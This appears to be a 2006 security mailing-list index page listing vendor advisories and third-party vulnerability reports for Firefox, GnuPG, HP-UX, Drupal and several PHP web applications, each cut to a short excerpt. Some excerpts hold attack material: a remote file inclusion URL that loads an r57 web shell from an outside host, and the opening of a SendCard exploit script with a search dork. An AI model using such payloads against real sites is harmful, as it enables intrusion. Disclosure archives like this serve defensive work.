[ GLSA 200608-03 ] Mozilla Firefox: Multiple vulnerabilities
2006-08-03 Thierry Carrez (koon gentoo org)

[DRUPAL-SA-2006-011] Drupal 4.7.3 / 4.6.9 fixes XSS issue
2006-08-03 Uwe Hermann (uwe hermann-uwe de)

vbulletin 3.5.4 IE exploit xss
2006-08-03 stefan dakotacom net
---------------------------
XSS vbulletin 3.5.4 With IE
---------------------------
Author: Stefan
Group: EnigmaGroup
---------------------------
This is XSS that only works using IE
By saving malicious code as a .pdf and uploading as an attachment on a post. When the attachment is viewed in IE

SolpotCrew Advisory #5 - modernbill ver 1.6 (DIR) Remote File Inclusion
2006-08-03 chris_hasibuan yahoo com
#############################SolpotCrew Community################################
#
# modernbill ver 1.6 (DIR) Remote File Inclusion
#
# Download file : http://freshmeat.net/projects/modernbill/
#
#################################################################################
#
#

[SECURITY] [DSA 1140-1] New GnuPG packages fix denial of service
2006-08-03 joey infodrom org (Martin Schulze)

[ GLSA 200608-02 ] Mozilla SeaMonkey: Multiple vulnerabilities
2006-08-03 Stefan Cornelius (dercorny gentoo org)

Javascript software authentication brute force attack
2006-08-03 Gianstefano Monni (gianstefano lugnu it)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

0. HISTORICAL CONSIDERATIONS
Nowadays it's very easy to have a virtual server with (for instance) mysql and php or any other sort of server-side authentication system, but some time ago many people were trying to use some kinds of client-authenticatio

[SECURITY] [DSA 1139-1] New ruby1.6 packages fix privilege escalation
2006-08-03 Moritz Muehlenhoff (jmm debian org)

[USN-332-1] gnupg vulnerability
2006-08-03 Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-332-1 August 03, 2006
gnupg vulnerability
CVE-2006-3746
===========================================================
A security issue affects the following Ubuntu releases:
Ubuntu 5.04
Ubuntu 5.10
Ubu

[USN-331-1] Linux kernel vulnerabilities
2006-08-03 Martin Pitt (martin pitt canonical com)
===========================================================
Ubuntu Security Notice USN-331-1 August 03, 2006
linux-source-2.6.15 vulnerabilities
CVE-2006-2934, CVE-2006-2935, CVE-2006-2936
===========================================================
A security issue affects the following

SendCard <= 3.4.0 unauthorized administrative access / remote commands execution
2006-08-03 rgod autistici org
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "SendCard <= 3.4.0 unauthorized administrative access / remote commands\n";
echo "execution exploit\n";
echo "by rgod rgod (at) autistici (dot) org\n";
echo "site: http://retrogod.altervista.org\n";
echo "dork: \"Powered by sendcard - an advanced PHP e-card

Secunia Research: PC Tools AntiVirus Insecure Default DirectoryPermissions
2006-08-03 Secunia Research (remove-vuln secunia com)

Vwar v1.5.0 <= Sql Injection and XSS vuln.
2006-08-03 mfoxhacker gmail com
IHST > Iran HackerZ Security Team (WhiteHat Part)
-------------------------------------------------
Vendor : www.vwar.de
vuln. Version = v1.5.0 and lower
Credits : MFox
Contact : mfoxhacker (at) gmail (dot) com
HomePage : www.hackerz.ir
-------------------------------------------------
Proof of Concept

[MajorSecurity Advisory #27]ToendaCMS - Cross Site Scripting Issue
2006-08-03 admin majorsecurity de
[MajorSecurity Advisory #27]ToendaCMS - Cross Site Scripting Issue
Details
=======
Product: Toenda CMS
Affected Version: <=1.0.3(stable) and 1.1
Immune Version: None known
Security-Risk: low
Remote-Exploit: yes
Vendor-URL: http://www.toenda.com/
Vendor-Status: informed
Advisory-Status: p

TSEP <= 0.942 Remote File Include
2006-08-02 beford (xbefordx gmail com)
Script: TSEP <= 0.942
URL: www.tsep.info
Discovered: beford <xbefordx gmail com>
Comments: "register_globals" must be enabled duh. document.this != http://www.milw0rm.com/exploits/2098
Vulnerable Files/Code:
./tsep.0942/include/colorswitch.php?tsep_config[absPath]=http://rst.void .ru/download/r57sh

Simpliciti Locked Browser Jail Breakout Vulnerability
2006-08-02 EvilPacket (evilpacket gmail com)
Simpliciti Locked Browser Jail Breakout Vulnerability
ESRL Discovery Date: March 20, 2006
Discovery By: Adam Baldwin (adam_baldwin (at) evilpacket (dot) net)
Versions Affected: All versions
Background: Simpliciti Locked Browser is a product that provides "no-programming required PC lockdown..." functionalit

[security bulletin] HPSBUX02087 SSRT4728 rev.3 - HP-UX running TCP/IP Remote Denial of Service (DoS)
2006-08-02 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00579189
Version: 3
HPSBUX02087 SSRT4728 rev.3 - HP-UX running TCP/IP Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

Hobbit monitor security bugfix release - 4.1.2p2
2006-08-02 henrik hswn dk (Henrik Stoerner)
Version 4.1.2p2 of Hobbit has just been uploaded to SourceForge, and is available at http://sourceforge.net/project/showfiles.php?group_id=128058&package_id=140220&release_id=436594
This release fixes a security bug reported by Jason Kruse earlier today: File access via the Hobbit "config" method f

OZJournal v1.5 - XSS
2006-08-02 luny youfucktard com
OZJournal v1.5
Homepage: http://ozjournals.awardspace.com/index.php
Affected files:
search input box
index.php
viewing archives
show comment page
----------------------------------------
XSS vulnerability via search input box: Data isn't properly sanitized before being displayed. F

[security bulletin] HPSBUX02124 SSRT061159 rev.1 - HP-UX Sendmail MIME Remote Denial of Service (DoS)
2006-08-02 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00680632
Version: 1
HPSBUX02124 SSRT061159 rev.1 - HP-UX Sendmail MIME Remote Denial of Service (DoS)
NOTICE: The information in this Security Bulletin should be acted upon as soon as possible.

[security bulletin] HPSBGN02136 SSRT061173 rev.1 - ProCurve Series 3500yl, 6200yl, and 5400zl Switches Running Software Prior to K.11.33 Remote Denial of Service (DoS)
2006-08-02 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00732233
Version: 1
HPSBGN02136 SSRT061173 rev.1 - ProCurve Series 3500yl, 6200yl, and 5400zl Switches Running Software Prior to K.11.33 Remote Denial of Service (DoS)
NOTICE: The information i

[SECURITY] [DSA 1136-1] New gpdf packages fix denial of service
2006-08-02 joey infodrom org (Martin Schulze)

[security bulletin] HPSBUX02108 SSRT061133 rev.13 - HP-UX Running Sendmail, Remote Execution of Arbitrary Code
2006-08-02 security-alert hp com
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

SUPPORT COMMUNICATION - SECURITY BULLETIN
Document ID: c00629555
Version: 13
HPSBUX02108 SSRT061133 rev.13 - HP-UX Running Sendmail, Remote Execution of Arbitrary Code
NOTICE: The information in this Security Bulletin should be acted upon as soon as
+
+ ME Download System 1.3 Remote File Inclusion
+
+--------------------------------------------------------------------
+
+ Affected Software .: ME Download System 1.3
+ Vendor ............: http://www.ehmig.net/
+ Class